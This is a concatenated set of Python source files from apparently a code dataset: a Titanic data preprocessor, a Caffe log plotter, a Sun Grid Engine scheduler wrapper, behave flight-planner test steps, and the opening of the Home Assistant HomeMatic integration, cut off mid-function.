"Sir.": "Mr.",
"Ms.": "Mrs.",
"": "Mr.",
"Col.": "Mr.",
"Capt.": "Mr.",
"Lady.": "Mrs.",
"the Countess. of": "Mrs.",
}
def __init__(self, filename: Union[str, Path], drop_columns=None):
        """Extract Training Data from file or Path
        Arguments:
            filename {[str]} -- Filename of CSV data file containing data.
            drop_columns -- Columns in dataframe that should be dropped.
        """
if drop_columns is None:
drop_columns = ["age", "cabin", "name", "ticket"]
self.filename = filename
self.drop_columns = drop_columns
self.all_label_columns = ["survived"]
self.all_feature_columns = [
"pclass",
"name",
"sex",
"age",
"sibsp",
"parch",
"ticket",
"fare",
"cabin",
"embarked",
]
self.Xy_raw = None
self.Xy = None
self.extract_raw()
self.Xy = self.Xy_raw.copy()
self.extract_title()
self.extract_last_name()
def extract_raw(self):
"""
Extracts data from a CSV file.
Returns:
pd.DataFrame -- [description]
"""
Xy_raw = pd.read_csv(self.filename)
Xy_raw.columns = Xy_raw.columns.str.lower().str.replace(" ", "_")
Xy_raw = Xy_raw.rename(columns={'age':'age_known'})
Xy_raw["pclass"] = Xy_raw["pclass"].astype("category")
self.Xy_raw = Xy_raw.set_index("passengerid")
    def extract_cabin_number(self):
        self.Xy['cabin_number'] = self.Xy.ticket.str.extract(r'(\d+)$')
    def extract_cabin_prefix(self):
        self.Xy['cabin_prefix'] = self.Xy.ticket.str.extract(r'^(.+) ')
def extract_title(self):
"""[summary]
"""
self.Xy["title"] = (
self.Xy.name.apply(lambda x: HumanName(x).title)
.replace(self.title_translator)
.replace({"\.": ""}, regex=True)
)
def extract_last_name(self):
self.Xy["last_name"] = self.Xy.name.apply(lambda x: HumanName(x).last)
def clean(self,):
"""Clean data to remove missing data and "unnecessary" features.
Arguments:
in_raw_df {pd.DataFrame} -- Dataframe containing all columns and rows Kaggle Titanic Training Data set
"""
self.Xy = self.Xy_raw.drop(self.drop_columns, axis=1)
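    # Hypothetical usage sketch (added for illustration; "train.csv" and the
    # calls below are assumptions, not part of the original history snapshot):
    #   data = ExtractData("train.csv")   # loads CSV, extracts titles/last names
    #   aged = estimate_age(data.Xy)      # fills missing ages by sex and title
    #   data.clean()                      # drops the configured raw columns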
def estimate_age(in_df, groupby=('sex', 'title')):
    groupby = list(groupby)
    Xy_age_estimate = in_df.groupby(groupby).age_known.mean().to_frame().round(1)
    Xy_age_estimate = Xy_age_estimate.rename(columns={'age_known': 'age_estimate'})
    out_df = in_df.reset_index().merge(Xy_age_estimate, on=groupby)
    out_df['age'] = out_df['age_known'].fillna(out_df['age_estimate'])
    return out_df
| 29.4 | 114 | 0.550049 |
4a27d7a86c2f4dd8f0a2fecadb9faf60c9922361 | 2,172 | py | Python | util/caffe_.py | saicoco/SA-Text | 353a73d84246a54962f3b7ffb7c7ca2e35f235e8 | [
"MIT"
] | 47 | 2020-02-21T23:36:28.000Z | 2021-12-21T01:34:38.000Z | util/caffe_.py | sapjunior/SA-Text | 353a73d84246a54962f3b7ffb7c7ca2e35f235e8 | [
"MIT"
] | 4 | 2020-04-03T04:59:54.000Z | 2021-11-04T08:14:52.000Z | util/caffe_.py | sapjunior/SA-Text | 353a73d84246a54962f3b7ffb7c7ca2e35f235e8 | [
"MIT"
] | 18 | 2020-02-21T10:06:34.000Z | 2021-09-15T01:50:55.000Z |
# encoding=utf-8
import util
def get_data(net, name):
import caffe
if isinstance(net, caffe._caffe.Solver):
net = net.net
return net.blobs[name].data[...]
def get_params(net, name = None):
import caffe
if isinstance(net, caffe._caffe.Solver):
net = net.net
params = net.params[name]
p = []
for param in params:
p.append(param.data[...])
return p
def draw_log(log_path, output_names, show = False, save_path = None, from_to = None, smooth = False):
pattern = "Train net output: word_bbox_loc_loss = "
log_path = util.io.get_absolute_path(log_path)
f = open(log_path,'r')
iterations = []
outputs = {}
plt = util.plt.plt
for line in f.readlines():
if util.str.contains(line, 'Iteration') and util.str.contains(line, 'loss = '):
s = line.split('Iteration')[-1]
iter_num = util.str.find_all(s, '\d+')[0]
iter_num = int(iter_num)
iterations.append(iter_num)
if util.str.contains(line, "Train net output #"):
s = util.str.split(line, 'Train net output #\d+\:')[-1]
s = s.split('(')[0]
output = util.str.find_all(s, '\d*\.*\d+e*\-*\d*\.*\d*')[-1]
output = eval(output)
output = float(output)
for name in output_names:
ptr = ' '+ name + ' ='
if util.str.contains(line, ptr):
if name not in outputs:
outputs[name] = []
outputs[name].append(output)
if len(outputs)==0:
return
for name in outputs:
output = outputs[name]
if smooth:
output = util.np.smooth(output)
start = 0
end = len(output)
if from_to is not None:
start = from_to[0]
end = from_to[1]
line_style = util.plt.get_random_line_style()
plt.plot(iterations[start: end], output[start: end], line_style, label = name)
plt.legend()
if save_path is not None:
util.plt.save_image(save_path)
if show:
util.plt.show()
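# Illustration (assumption, not from the original module): log lines this parser
# matches, e.g.
#   "Iteration 1200, loss = 0.8421" feeds `iterations`, while
#   "    Train net output #0: word_bbox_loc_loss = 0.1234 (* 1 = 0.1234 loss)"
#   appends 0.1234 to outputs['word_bbox_loc_loss'].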
| 31.941176 | 101 | 0.535451 |
4a27d7cf6b516c363a43116f3c53224c9d786ca0 | 15,928 | py | Python | mycluster/schedulers/sge.py | zenotech/MyCluster | 0399e2bb95c31efd8f99c6f0f3941d0c1f7d42c4 | [
"BSD-3-Clause"
] | 7 | 2017-05-04T13:38:16.000Z | 2020-09-28T02:44:01.000Z | mycluster/schedulers/sge.py | zenotech/MyCluster | 0399e2bb95c31efd8f99c6f0f3941d0c1f7d42c4 | [
"BSD-3-Clause"
] | 27 | 2015-01-05T13:39:22.000Z | 2020-01-16T11:56:56.000Z | mycluster/schedulers/sge.py | zenotech/MyCluster | 0399e2bb95c31efd8f99c6f0f3941d0c1f7d42c4 | [
"BSD-3-Clause"
] | 4 | 2017-05-21T17:01:18.000Z | 2019-12-11T15:31:18.000Z |
# BSD 3-Clause License
# Copyright(c) 2021, Zenotech
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and / or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import re
import math
import subprocess
import datetime
from .base import Scheduler
from mycluster.exceptions import SchedulerException, ConfigurationException
class SGE(Scheduler):
def scheduler_type(self):
return "sge"
def name(self):
return os.getenv("SGE_CLUSTER_NAME")
def queues(self):
# list all parallel env
# for parallel_env list queues associated
# Find first node with queue and record node config
queue_list = []
parallel_env_list = []
with os.popen("qconf -spl") as f:
for line in f:
parallel_env_list.append(line.strip())
for parallel_env in parallel_env_list:
with os.popen("qstat -pe " + parallel_env + " -U `whoami` -g c") as f:
f.readline() # read header
f.readline() # read separator
for line in f:
queue_name = line.split(" ")[0].strip()
# Check if user has permission to use queue
with os.popen("qstat -g c -U `whoami` -q " + queue_name) as f2:
try:
f2.readline()
f2.readline()
if len(f2.readline()):
queue_list.append(parallel_env + ":" + queue_name)
except:
pass
return queue_list
def node_config(self, queue_id):
# Find first node with queue and record node config
parallel_env = queue_id.split(":")[0]
queue_name = queue_id.split(":")[1]
host_group = 0
with os.popen("qconf -sq " + queue_name) as f:
for line in f:
if line.split(" ")[0] == "hostlist":
new_line = re.sub(" +", " ", line)
host_group = new_line.split(" ")[1]
config = {}
host_name = ""
found = False
        if host_group[0] == "@":
# Is a host group
with os.popen("qconf -shgrp_resolved " + host_group) as f:
for line in f:
for host_name in line.split(" "):
with os.popen("qhost -q -h " + host_name) as f:
header = f.readline() # read header
f.readline() # read separator
new_header = re.sub(" +", " ", header).strip()
# sge <=6.2u4 style
if (new_header.split(" ")[3]) == "LOAD":
for line in f:
if line[0] != " ":
name = line.split(" ")[0]
if name != "global":
new_line = re.sub(" +", " ", line).strip()
if new_line.split(" ")[3] != "-":
config["max task"] = int(
new_line.split(" ")[2]
)
config["max thread"] = int(
new_line.split(" ")[2]
)
config["max memory"] = new_line.split(
" "
)[4]
found = True
break
else:
for line in f:
if line[0] != " ":
name = line.split(" ")[0]
if name != "global":
new_line = re.sub(" +", " ", line).strip()
if new_line.split(" ")[3] != "-":
config["max task"] = int(
new_line.split(" ")[4]
)
config["max thread"] = int(
new_line.split(" ")[5]
)
config["max memory"] = new_line.split(
" "
)[7]
found = True
break
if found:
break
else:
# Is a host
host_name = host_group
with os.popen("qhost -q -h " + host_name) as f:
header = f.readline() # read header
f.readline() # read separator
new_header = re.sub(" +", " ", header).strip()
if (new_header.split(" ")[3]) == "LOAD": # sge <=6.2u4 style
for line in f:
if line[0] != " ":
name = line.split(" ")[0]
if name != "global":
new_line = re.sub(" +", " ", line).strip()
if new_line.split(" ")[3] != "-":
config["max task"] = int(new_line.split(" ")[2])
config["max thread"] = int(new_line.split(" ")[2])
config["max memory"] = new_line.split(" ")[4]
else:
config["max task"] = 0
config["max thread"] = 0
config["max memory"] = 0
else:
for line in f:
if line[0] != " ":
name = line.split(" ")[0]
if name != "global":
new_line = re.sub(" +", " ", line).strip()
if new_line.split(" ")[3] != "-":
config["max task"] = int(new_line.split(" ")[4])
config["max thread"] = int(new_line.split(" ")[5])
config["max memory"] = new_line.split(" ")[7]
else:
config["max task"] = 0
config["max thread"] = 0
config["max memory"] = 0
return config
def tasks_per_node(self, queue_id):
parallel_env = queue_id.split(":")[0]
queue_name = queue_id.split(":")[1]
tasks = 0
with os.popen("qconf -sq " + queue_name) as f:
for line in f:
if line.split(" ")[0] == "slots":
tasks = int(re.split("\W+", line)[1])
pe_tasks = tasks
with os.popen("qconf -sp " + parallel_env) as f:
try:
for line in f:
if line.split(" ")[0] == "allocation_rule":
try:
# This may throw exception as allocation rule
# may not always be an integer
pe_tasks = int(re.split("\W+", line)[1])
except ValueError as e:
raise SchedulerException("Error parsing SGE output")
except:
pass
return min(tasks, pe_tasks)
def available_tasks(self, queue_id):
# split queue id into queue and parallel env
# list free slots
free_tasks = 0
max_tasks = 0
parallel_env = queue_id.split(":")[0]
queue_name = queue_id.split(":")[1]
with os.popen(" qstat -pe " + parallel_env + " -U `whoami` -g c") as f:
f.readline() # read header
f.readline() # read separator
for line in f:
# remove multiple white space
new_line = re.sub(" +", " ", line)
qn = new_line.split(" ")[0]
if qn == queue_name:
free_tasks = int(new_line.split(" ")[4])
max_tasks = int(new_line.split(" ")[5])
return {"available": free_tasks, "max tasks": max_tasks}
def _min_tasks_per_node(self, queue_id):
"""
This function is used when requesting non exclusive use
as the parallel environment might enforce a minimum number
of tasks
"""
parallel_env = queue_id.split(":")[0]
queue_name = queue_id.split(":")[1]
tasks = 1
pe_tasks = tasks
with os.popen("qconf -sp " + parallel_env) as f:
try:
for line in f:
if line.split(" ")[0] == "allocation_rule":
# This may throw exception as allocation rule
# may not always be an integer
pe_tasks = int(re.split("\W+", line)[1])
except:
pass
return max(tasks, pe_tasks)
def create_submit(
self,
queue_id,
num_tasks,
job_name,
job_script,
wall_clock,
openmpi_args="-bysocket -bind-to-socket",
project_name="default",
tasks_per_node=None,
threads_per_task=1,
user_email=None,
qos=None,
exclusive=True,
output_name=None,
):
parallel_env = queue_id.split(":")[0]
queue_name = queue_id.split(":")[1]
if tasks_per_node is None:
tasks_per_node = self.tasks_per_node(queue_id)
num_nodes = int(math.ceil(float(num_tasks) / float(tasks_per_node)))
if threads_per_task is None:
threads_per_task = 1
if ":" not in wall_clock:
wall_clock = wall_clock + ":00:00"
if "mycluster-" in job_script:
job_script = self._get_data(job_script)
if output_name is None:
output_name = job_name + ".out"
# For exclusive node use total number of slots required
# is number of nodes x number of slots offer by queue
num_queue_slots = num_nodes * self.tasks_per_node(queue_id)
if not exclusive:
if num_nodes == 1: # Assumes fill up rule
num_queue_slots = max(
tasks_per_node, self._min_tasks_per_node(queue_id)
)
template = self._load_template("sge.jinja")
script_str = template.render(
my_name=job_name,
my_script=job_script,
my_output=output_name,
user_email=user_email,
queue_name=queue_name,
parallel_env=parallel_env,
num_queue_slots=num_queue_slots,
num_tasks=num_tasks,
tpn=tasks_per_node,
num_threads_per_task=threads_per_task,
num_nodes=num_nodes,
project_name=project_name,
wall_clock=wall_clock,
openmpi_args=openmpi_args,
qos=qos,
exclusive=exclusive,
)
return script_str
def submit(
self, script_name, immediate=False, depends_on=None, depends_on_always_run=False
):
job_id = None
output = subprocess.run(
f"qsub -V -terse {script_name}",
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
if output.returncode == 0:
job_id = 0
out = output.stdout.decode("utf-8")
try:
                job_id = int(out.strip().splitlines()[0])
                return job_id
            except (ValueError, IndexError):
                raise SchedulerException("Error submitting job to SGE")
else:
raise SchedulerException(
f"Error submitting job to SGE: {output.stderr.decode('utf-8')}"
)
def list_current_jobs(self):
jobs = []
output = subprocess.run(
"qstat -u `whoami`",
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
if output.returncode == 0:
for line in output.stdout.decode("utf-8").splitlines():
if line.startswith("job-ID") or line.startswith("---"):
continue
job_info = re.sub(" +", " ", line.strip()).split(" ")
jobs.append(
{
"id": int(job_info[0]),
"queue": job_info[6],
"name": job_info[2],
"state": job_info[4],
}
)
else:
raise SchedulerException("Error fetching job queue listing")
return jobs
def get_job_details(self, job_id):
"""
Get full job and step stats for job_id
First check using sacct, then fallback to squeue
"""
stats_dict = {}
output = {}
with os.popen("qacct -j " + str(job_id)) as f:
try:
f.readline() # read header
for line in f:
new_line = re.sub(" +", " ", line.strip())
output[new_line.split(" ")[0]] = new_line.split(" ", 1)[1]
except:
pass
stats_dict["wallclock"] = datetime.timedelta(
seconds=int(output["ru_wallclock"])
)
stats_dict["mem"] = output["mem"]
stats_dict["cpu"] = datetime.timedelta(seconds=int(output["cpu"].split(".")[0]))
stats_dict["queue"] = output["granted_pe"] + ":" + output["qname"]
return stats_dict
def delete(self, job_id):
cmd = f"qdel {job_id}"
output = subprocess.run(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True
)
if output.returncode != 0:
raise SchedulerException(f"Error cancelling job {job_id}")
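# ------------------------------------------------------------------------------
# Hypothetical usage sketch (added for illustration, not part of the original
# module): how the SGE scheduler above is typically driven.  It assumes the
# Scheduler base class needs no constructor arguments and that SGE's
# qconf/qstat/qsub binaries are available; queue and script names are made up.
def _example_submit():
    scheduler = SGE()
    queue_id = scheduler.queues()[0]          # e.g. "mpi:all.q"
    script = scheduler.create_submit(
        queue_id, num_tasks=8, job_name="demo",
        job_script="run.sh", wall_clock="1:00:00")
    with open("demo_submit.sh", "w") as fh:
        fh.write(script)
    return scheduler.submit("demo_submit.sh")
# ------------------------------------------------------------------------------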
| 40.841026 | 88 | 0.458312 |
4a27d873156de2cbb7a548f4f35e07f26d2703de | 2,001 | py | Python | Features/steps/add_flight.py | tbielski/flights-planner | ad2f7a6ef4ef80b71a1d71d1655c4101131b54a6 | [
"MIT"
] | null | null | null | Features/steps/add_flight.py | tbielski/flights-planner | ad2f7a6ef4ef80b71a1d71d1655c4101131b54a6 | [
"MIT"
] | null | null | null | Features/steps/add_flight.py | tbielski/flights-planner | ad2f7a6ef4ef80b71a1d71d1655c4101131b54a6 | [
"MIT"
] | null | null | null |
from behave import *
from datetime import datetime
from flights_planner.FlightRepository import FlightRepository
from flights_planner.EconomyFlight import EconomyFlight
from flights_planner.BusinessFlight import BusinessFlight
from flights_planner.PremiumFlight import PremiumFlight
use_step_matcher("re")
@given("there is a flights_repository")
def step_impl(context):
context.repository = FlightRepository([])
@given("there is a business flight")
def step_impl(context):
context.business_flight = BusinessFlight("0", "Gdańsk", "Warszawa", datetime(2019, 12, 12, 22, 00))
@when("we add a business flight")
def step_impl(context):
context.repository.add_flight(context.business_flight)
@then("flights_repository1 should have one flight")
def step_impl(context):
assert context.business_flight.flight_id == "0"
assert len(context.repository.data_source) == 1
assert context.repository.data_source[0].flight_id == "0"
@given("there is a economy flight")
def step_impl(context):
context.economy_flight = EconomyFlight("0", "Gdańsk", "Warszawa", datetime(2019, 12, 12, 22, 00))
@when("we add an economy flight")
def step_impl(context):
context.repository.add_flight(context.economy_flight)
@then("flights_repository2 should have one flight")
def step_impl(context):
assert context.economy_flight.flight_id == "0"
assert len(context.repository.data_source) == 1
assert context.repository.data_source[0].flight_id == "0"
@given("there is a premium flight")
def step_impl(context):
context.premium_flight = PremiumFlight("0", "Gdańsk", "Warszawa", datetime(2019, 12, 12, 22, 00))
@when("we add a premium flight")
def step_impl(context):
context.repository.add_flight(context.premium_flight)
@then("flights_repository3 should have one flight")
def step_impl(context):
assert context.premium_flight.flight_id == "0"
assert len(context.repository.data_source) == 1
assert context.repository.data_source[0].flight_id == "0"
| 29.426471 | 103 | 0.758121 |
4a27d918d95292fa7160c40d342a0faa671f33a4 | 31,008 | py | Python | homeassistant/components/homematic/__init__.py | Tony763/home-assistant | fa1df2e015d76abfc6cfd7d795eb439130f5d0ea | [
"Apache-2.0"
] | null | null | null | homeassistant/components/homematic/__init__.py | Tony763/home-assistant | fa1df2e015d76abfc6cfd7d795eb439130f5d0ea | [
"Apache-2.0"
] | 3 | 2021-09-08T03:29:36.000Z | 2022-03-12T00:59:48.000Z | homeassistant/components/homematic/__init__.py | akhan69/home-assistant | fb460a325e25fdea9043136bccaf546ec1c04eab | [
"Apache-2.0"
] | null | null | null | """Support for HomeMatic devices."""
from datetime import timedelta
from functools import partial
import logging
import socket
import voluptuous as vol
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_NAME, CONF_HOST, CONF_HOSTS, CONF_PASSWORD,
CONF_PLATFORM, CONF_SSL, CONF_USERNAME, CONF_VERIFY_SSL,
EVENT_HOMEASSISTANT_STOP, STATE_UNKNOWN)
from homeassistant.helpers import discovery
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
REQUIREMENTS = ['pyhomematic==0.1.56']
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'homematic'
SCAN_INTERVAL_HUB = timedelta(seconds=300)
SCAN_INTERVAL_VARIABLES = timedelta(seconds=30)
DISCOVER_SWITCHES = 'homematic.switch'
DISCOVER_LIGHTS = 'homematic.light'
DISCOVER_SENSORS = 'homematic.sensor'
DISCOVER_BINARY_SENSORS = 'homematic.binary_sensor'
DISCOVER_COVER = 'homematic.cover'
DISCOVER_CLIMATE = 'homematic.climate'
DISCOVER_LOCKS = 'homematic.locks'
ATTR_DISCOVER_DEVICES = 'devices'
ATTR_PARAM = 'param'
ATTR_CHANNEL = 'channel'
ATTR_ADDRESS = 'address'
ATTR_VALUE = 'value'
ATTR_INTERFACE = 'interface'
ATTR_ERRORCODE = 'error'
ATTR_MESSAGE = 'message'
ATTR_MODE = 'mode'
ATTR_TIME = 'time'
ATTR_UNIQUE_ID = 'unique_id'
ATTR_PARAMSET_KEY = 'paramset_key'
ATTR_PARAMSET = 'paramset'
EVENT_KEYPRESS = 'homematic.keypress'
EVENT_IMPULSE = 'homematic.impulse'
EVENT_ERROR = 'homematic.error'
SERVICE_VIRTUALKEY = 'virtualkey'
SERVICE_RECONNECT = 'reconnect'
SERVICE_SET_VARIABLE_VALUE = 'set_variable_value'
SERVICE_SET_DEVICE_VALUE = 'set_device_value'
SERVICE_SET_INSTALL_MODE = 'set_install_mode'
SERVICE_PUT_PARAMSET = 'put_paramset'
HM_DEVICE_TYPES = {
DISCOVER_SWITCHES: [
'Switch', 'SwitchPowermeter', 'IOSwitch', 'IPSwitch', 'RFSiren',
'IPSwitchPowermeter', 'HMWIOSwitch', 'Rain', 'EcoLogic',
'IPKeySwitchPowermeter', 'IPGarage', 'IPKeySwitch', 'IPMultiIO'],
DISCOVER_LIGHTS: ['Dimmer', 'KeyDimmer', 'IPKeyDimmer', 'IPDimmer',
'ColorEffectLight'],
DISCOVER_SENSORS: [
'SwitchPowermeter', 'Motion', 'MotionV2', 'RemoteMotion', 'MotionIP',
'ThermostatWall', 'AreaThermostat', 'RotaryHandleSensor',
'WaterSensor', 'PowermeterGas', 'LuxSensor', 'WeatherSensor',
'WeatherStation', 'ThermostatWall2', 'TemperatureDiffSensor',
'TemperatureSensor', 'CO2Sensor', 'IPSwitchPowermeter', 'HMWIOSwitch',
'FillingLevel', 'ValveDrive', 'EcoLogic', 'IPThermostatWall',
'IPSmoke', 'RFSiren', 'PresenceIP', 'IPAreaThermostat',
'IPWeatherSensor', 'RotaryHandleSensorIP', 'IPPassageSensor',
'IPKeySwitchPowermeter', 'IPThermostatWall230V', 'IPWeatherSensorPlus',
'IPWeatherSensorBasic', 'IPBrightnessSensor', 'IPGarage',
'UniversalSensor', 'MotionIPV2', 'IPMultiIO'],
DISCOVER_CLIMATE: [
'Thermostat', 'ThermostatWall', 'MAXThermostat', 'ThermostatWall2',
'MAXWallThermostat', 'IPThermostat', 'IPThermostatWall',
'ThermostatGroup', 'IPThermostatWall230V'],
DISCOVER_BINARY_SENSORS: [
'ShutterContact', 'Smoke', 'SmokeV2', 'Motion', 'MotionV2',
'MotionIP', 'RemoteMotion', 'WeatherSensor', 'TiltSensor',
'IPShutterContact', 'HMWIOSwitch', 'MaxShutterContact', 'Rain',
'WiredSensor', 'PresenceIP', 'IPWeatherSensor', 'IPPassageSensor',
'SmartwareMotion', 'IPWeatherSensorPlus', 'MotionIPV2', 'WaterIP',
'IPMultiIO', 'TiltIP'],
DISCOVER_COVER: ['Blind', 'KeyBlind', 'IPKeyBlind', 'IPKeyBlindTilt'],
DISCOVER_LOCKS: ['KeyMatic']
}
HM_IGNORE_DISCOVERY_NODE = [
'ACTUAL_TEMPERATURE',
'ACTUAL_HUMIDITY'
]
HM_IGNORE_DISCOVERY_NODE_EXCEPTIONS = {
'ACTUAL_TEMPERATURE': [
'IPAreaThermostat', 'IPWeatherSensor',
'IPWeatherSensorPlus', 'IPWeatherSensorBasic'],
}
HM_ATTRIBUTE_SUPPORT = {
'LOWBAT': ['battery', {0: 'High', 1: 'Low'}],
'LOW_BAT': ['battery', {0: 'High', 1: 'Low'}],
'ERROR': ['sabotage', {0: 'No', 1: 'Yes'}],
'ERROR_SABOTAGE': ['sabotage', {0: 'No', 1: 'Yes'}],
'SABOTAGE': ['sabotage', {0: 'No', 1: 'Yes'}],
'RSSI_PEER': ['rssi_peer', {}],
'RSSI_DEVICE': ['rssi_device', {}],
'VALVE_STATE': ['valve', {}],
'LEVEL': ['level', {}],
'BATTERY_STATE': ['battery', {}],
'CONTROL_MODE': ['mode', {
0: 'Auto',
1: 'Manual',
2: 'Away',
3: 'Boost',
4: 'Comfort',
5: 'Lowering'
}],
'POWER': ['power', {}],
'CURRENT': ['current', {}],
'VOLTAGE': ['voltage', {}],
'OPERATING_VOLTAGE': ['voltage', {}],
'WORKING': ['working', {0: 'No', 1: 'Yes'}]
}
HM_PRESS_EVENTS = [
'PRESS_SHORT',
'PRESS_LONG',
'PRESS_CONT',
'PRESS_LONG_RELEASE',
'PRESS',
]
HM_IMPULSE_EVENTS = [
'SEQUENCE_OK',
]
CONF_RESOLVENAMES_OPTIONS = [
'metadata',
'json',
'xml',
False
]
DATA_HOMEMATIC = 'homematic'
DATA_STORE = 'homematic_store'
DATA_CONF = 'homematic_conf'
CONF_INTERFACES = 'interfaces'
CONF_LOCAL_IP = 'local_ip'
CONF_LOCAL_PORT = 'local_port'
CONF_PORT = 'port'
CONF_PATH = 'path'
CONF_CALLBACK_IP = 'callback_ip'
CONF_CALLBACK_PORT = 'callback_port'
CONF_RESOLVENAMES = 'resolvenames'
CONF_JSONPORT = 'jsonport'
CONF_VARIABLES = 'variables'
CONF_DEVICES = 'devices'
CONF_PRIMARY = 'primary'
DEFAULT_LOCAL_IP = '0.0.0.0'
DEFAULT_LOCAL_PORT = 0
DEFAULT_RESOLVENAMES = False
DEFAULT_JSONPORT = 80
DEFAULT_PORT = 2001
DEFAULT_PATH = ''
DEFAULT_USERNAME = 'Admin'
DEFAULT_PASSWORD = ''
DEFAULT_SSL = False
DEFAULT_VERIFY_SSL = False
DEFAULT_CHANNEL = 1
DEVICE_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): 'homematic',
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_ADDRESS): cv.string,
vol.Required(ATTR_INTERFACE): cv.string,
vol.Optional(ATTR_CHANNEL, default=DEFAULT_CHANNEL): vol.Coerce(int),
vol.Optional(ATTR_PARAM): cv.string,
vol.Optional(ATTR_UNIQUE_ID): cv.string,
})
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Optional(CONF_INTERFACES, default={}): {cv.match_all: {
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PATH, default=DEFAULT_PATH): cv.string,
vol.Optional(CONF_RESOLVENAMES, default=DEFAULT_RESOLVENAMES):
vol.In(CONF_RESOLVENAMES_OPTIONS),
vol.Optional(CONF_JSONPORT, default=DEFAULT_JSONPORT): cv.port,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
vol.Optional(CONF_CALLBACK_IP): cv.string,
vol.Optional(CONF_CALLBACK_PORT): cv.port,
vol.Optional(CONF_SSL, default=DEFAULT_SSL): cv.boolean,
vol.Optional(
CONF_VERIFY_SSL, default=DEFAULT_VERIFY_SSL): cv.boolean,
}},
vol.Optional(CONF_HOSTS, default={}): {cv.match_all: {
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
}},
vol.Optional(CONF_LOCAL_IP, default=DEFAULT_LOCAL_IP): cv.string,
vol.Optional(CONF_LOCAL_PORT): cv.port,
}),
}, extra=vol.ALLOW_EXTRA)
SCHEMA_SERVICE_VIRTUALKEY = vol.Schema({
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_CHANNEL): vol.Coerce(int),
vol.Required(ATTR_PARAM): cv.string,
vol.Optional(ATTR_INTERFACE): cv.string,
})
SCHEMA_SERVICE_SET_VARIABLE_VALUE = vol.Schema({
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_VALUE): cv.match_all,
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
})
SCHEMA_SERVICE_SET_DEVICE_VALUE = vol.Schema({
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_CHANNEL): vol.Coerce(int),
vol.Required(ATTR_PARAM): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_VALUE): cv.match_all,
vol.Optional(ATTR_INTERFACE): cv.string,
})
SCHEMA_SERVICE_RECONNECT = vol.Schema({})
SCHEMA_SERVICE_SET_INSTALL_MODE = vol.Schema({
vol.Required(ATTR_INTERFACE): cv.string,
vol.Optional(ATTR_TIME, default=60): cv.positive_int,
vol.Optional(ATTR_MODE, default=1):
vol.All(vol.Coerce(int), vol.In([1, 2])),
vol.Optional(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
})
SCHEMA_SERVICE_PUT_PARAMSET = vol.Schema({
vol.Required(ATTR_INTERFACE): cv.string,
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_PARAMSET_KEY): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_PARAMSET): dict,
})
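# Illustration (assumption, not part of the original component): a service call
# matching SCHEMA_SERVICE_SET_DEVICE_VALUE above, with a made-up address:
#   service: homematic.set_device_value
#   data:
#     address: LEQ1234567
#     channel: 1
#     param: TARGET_TEMPERATURE
#     value: 21.5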
def setup(hass, config):
"""Set up the Homematic component."""
from pyhomematic import HMConnection
conf = config[DOMAIN]
hass.data[DATA_CONF] = remotes = {}
hass.data[DATA_STORE] = set()
# Create hosts-dictionary for pyhomematic
for rname, rconfig in conf[CONF_INTERFACES].items():
remotes[rname] = {
'ip': socket.gethostbyname(rconfig.get(CONF_HOST)),
'port': rconfig.get(CONF_PORT),
'path': rconfig.get(CONF_PATH),
'resolvenames': rconfig.get(CONF_RESOLVENAMES),
'jsonport': rconfig.get(CONF_JSONPORT),
'username': rconfig.get(CONF_USERNAME),
'password': rconfig.get(CONF_PASSWORD),
'callbackip': rconfig.get(CONF_CALLBACK_IP),
'callbackport': rconfig.get(CONF_CALLBACK_PORT),
'ssl': rconfig.get(CONF_SSL),
'verify_ssl': rconfig.get(CONF_VERIFY_SSL),
'connect': True,
}
for sname, sconfig in conf[CONF_HOSTS].items():
remotes[sname] = {
